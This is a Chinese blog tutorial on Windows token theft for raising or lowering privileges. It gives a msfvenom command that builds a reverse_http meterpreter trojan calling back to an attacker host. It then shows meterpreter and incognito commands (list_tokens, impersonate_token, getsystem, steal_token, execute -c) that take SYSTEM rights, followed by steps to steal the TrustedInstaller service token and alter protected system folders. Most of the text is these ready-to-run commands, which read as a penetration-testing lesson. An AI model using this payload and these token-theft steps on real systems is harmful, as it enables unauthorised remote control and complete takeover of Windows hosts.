通过token窃取实现降权或者提权

前言

windows中token有两种:

  1. Delegation token(授权令牌):用于交互会话登录,例如远程桌面
  2. Impersonation token(模拟令牌):用于非交互登录,例如dir远程主机的文c$

当我们拿到一台主机却不知道如何提权的时候,可以看看是否有高权限用户的token,如果有的话就有可能直接提权到administrator权限,这篇文章主要讲对token的利用。

通过msf实现

1.生成木马并以管理员权限运行

msfvenom  -p windows/meterpreter/reverse_http -a x86 -f exe --platform windows -o 1.exe  LHOST=172.16.250.1 LPORT=7777

2.实现提权到system

list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
getuid

在这里插入图片描述

3.降级到普通用户

list_tokens -u
impersonate_token "DESKTOP-RMP8TTT\test"
getuid

这时候发现权限已经很低了,很多命令都执行不了。

在这里插入图片描述

不过用msf降权后就无法再进行提权了。
在这里插入图片描述

通过incognito工具实现

同样得在管理员权限下执行,普通用户权限使用的话几乎看不到可用的token。
下载地址:https://github.com/shanfenglan/test

1. 实现提权到system

incognito.exe list_tokens -u
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

在这里插入图片描述

2. 降权到普通user

incognito.exe list_tokens -u
incognito.exe execute -c "DESKTOP-RMP8TTT\test" cmd.exe

在这里插入图片描述

获取TrustedInstaller权限

只有TrustedInstaller权限能修改系统文件,例如C:\Windows\servicing路径下system权限也无法创建文件:

在这里插入图片描述

这时候我们想办法提权到TrustedInstaller:

1.首先开启TrustedInstaller服务

sc start TrustedInstaller

在这里插入图片描述

2.找到TrustedInstaller对应的pid

首先切换到meterpreter下:

ps | grep TrustedInstaller

在这里插入图片描述
确定了TrustedInstaller.exe的pid为10780

3.提权到system并使用steal_token命令进行令牌窃取

getsystem
steal_token 10780

在这里插入图片描述

4.切换到交互式cmd验证权限

whoami /groups

在这里插入图片描述

5.修改系统文件夹

确定文件能创建成功。

在这里插入图片描述

参考文章

渗透技巧-Token窃取与利用

  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值